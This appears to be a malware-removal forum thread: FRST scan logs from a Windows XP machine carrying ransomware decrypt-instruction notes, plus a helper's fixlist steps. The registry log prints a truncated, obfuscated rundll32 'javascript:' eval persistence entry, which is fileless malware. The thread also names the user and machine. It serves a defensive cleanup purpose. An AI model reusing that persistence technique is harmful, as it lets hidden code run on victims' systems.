2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2013-03-21 11:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application DataGoogle
2014-08-04 16:54 - 2012-08-23 14:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft Help
2014-08-04 16:54 - 2012-08-20 19:03 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:51 - 2014-08-07 14:48 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-01 09:51 - 2014-08-01 10:14 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:43 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:42 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:42 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-24 20:44 - 2014-08-07 11:49 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-07-24 20:44 - 2014-07-24 21:06 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 09:33 - 2014-07-24 22:59 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-22 22:50 - 2014-08-04 17:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-07-22 22:50 - 2014-07-23 17:47 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 17:20 - 2014-08-06 16:26 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-07 17:20 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp
2014-08-07 17:19 - 2014-08-06 13:51 - 00000000 ____D () C:\FRST
2014-08-07 17:18 - 2012-08-20 19:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-08-07 17:18 - 2008-04-14 13:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-07 17:11 - 2014-08-04 17:04 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-07 17:11 - 2014-08-04 16:56 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-07 17:11 - 2012-08-22 11:16 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-08-07 17:11 - 2012-08-20 19:07 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-07 16:26 - 2014-08-07 16:23 - 00000000 ___SD () C:\ComboFix
2014-08-07 14:48 - 2014-08-04 17:04 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-07 14:48 - 2014-08-01 09:51 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-07 14:47 - 2012-08-20 19:10 - 00000098 ___SH () C:\Documents and Settings\Konstantine Trivizas\ntuser.ini
2014-08-07 14:31 - 2014-08-05 15:43 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-07 14:31 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-07 14:29 - 2012-08-22 10:36 - 00011994 _____ () C:\WINDOWS\system32\nvModes.001
2014-08-07 14:29 - 2004-10-26 12:01 - 00017112 _____ () C:\WINDOWS\system32\nvapps.xml
2014-08-07 14:25 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas
2014-08-07 14:24 - 2012-10-16 19:18 - 00000308 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:22 - 2013-02-21 00:09 - 00000910 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-07 14:22 - 2013-01-02 19:40 - 00000308 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:21 - 2014-08-04 17:04 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-07 14:20 - 2012-08-22 04:48 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978695_WM9$
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2012-08-20 16:12 - 00000327 __RSH () C:\boot.ini
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:03 - 2013-02-21 00:09 - 00000914 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-07 11:50 - 2012-08-23 12:38 - 00001038 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001UA.job
2014-08-07 11:49 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-08-07 11:42 - 2014-08-07 11:41 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:32 - 2014-08-06 16:31 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:24 - 2014-08-04 17:11 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-06 15:51 - 2012-08-23 12:38 - 00000986 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001Core.job
2014-08-06 14:38 - 2014-08-06 14:37 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-05 18:29 - 2014-08-04 17:10 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-05 17:15 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 17:15 - 2012-08-22 04:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:39 - 2014-08-05 12:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-05 15:38 - 2014-08-05 14:02 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:34 - 2014-08-05 15:33 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:12 - 2013-01-02 19:40 - 00000316 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-05 13:41 - 2014-08-05 13:40 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:41 - 2014-08-05 13:32 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:37 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\system32\mui
2014-08-05 13:36 - 2014-08-05 13:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:42 - 2012-08-22 04:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971657$
2014-08-05 12:41 - 2012-08-22 16:05 - 00131072 _____ () C:\WINDOWS\system32\config\OAlerts.evt
2014-08-04 17:48 - 2008-04-14 13:00 - 00000582 _____ () C:\WINDOWS\win.ini
2014-08-04 17:48 - 2008-04-14 13:00 - 00000227 _____ () C:\WINDOWS\system.ini
2014-08-04 17:39 - 2012-08-22 05:04 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB959426$
2014-08-04 17:37 - 2012-08-22 16:43 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Adobe
2014-08-04 17:15 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 17:02 - 2014-08-04 16:54 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 17:00 - 2014-08-04 16:59 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 12:03 - 2012-08-24 10:26 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\CAREER & INCOME
2014-08-04 11:10 - 2012-08-28 20:01 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\AEOLUS HOSPITALITY
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 10:48 - 2013-02-04 20:06 - 00000000 ____D () C:\WINDOWS\Minidump
2014-08-01 10:14 - 2014-08-01 09:51 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:55 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Skype
2014-08-01 09:52 - 2012-08-22 12:28 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-01 09:50 - 2014-08-01 09:43 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:50 - 2014-08-01 09:42 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:49 - 2013-01-02 19:40 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\RealNetworks
2014-08-01 09:49 - 2012-10-16 19:16 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Real
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2014-08-01 09:47 - 2013-01-02 19:38 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RealNetworks
2014-08-01 09:47 - 2012-08-20 18:59 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-01 09:46 - 2012-10-16 19:11 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Real
2014-08-01 09:42 - 2014-08-01 09:40 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:42 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\Help
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-30 18:30 - 2012-10-16 19:18 - 00000316 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-07-30 10:04 - 2012-09-03 19:24 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-24 23:21 - 2012-08-23 12:40 - 00002393 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Google Chrome.lnk
2014-07-24 23:10 - 2012-08-23 12:37 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google
2014-07-24 22:59 - 2014-07-23 09:33 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-24 21:06 - 2014-07-24 20:44 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 21:03 - 2013-11-01 13:17 - 00000000 ___HD () C:\DrFoneForAndroid
2014-07-24 21:03 - 2012-08-23 11:06 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 17:47 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
Some content of TEMP:
====================
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\70253a8e-3c9f-4d22-bd36-b8d19f4791c5.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\71e80baa-31c7-4340-91d3-25d57739bca6.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\catchme.dll
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\f47520ff-a754-403a-a719-51c1c4b8b4fd.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\jre-7u65-windows-i586-iftw.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End Of Log ============================


Nice, we're making some progress :)
 
 
Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

 
Download the attached fixlist.txt file and save it to the Desktop.
 
Both files, FRST and fixlist.txt, have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please attach it to your reply.

fixlist.txt


here is the addition.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:5-08-2014
Ran by Konstantine Trivizas (administrator) on KONSTANT-8F5437 on 07-08-2014 17:19:29
Running from C:\Documents and Settings\Konstantine Trivizas\Desktop
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Safe Mode (minimal)
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [519584 2010-12-21] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
URLSearchHook: HKCU - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
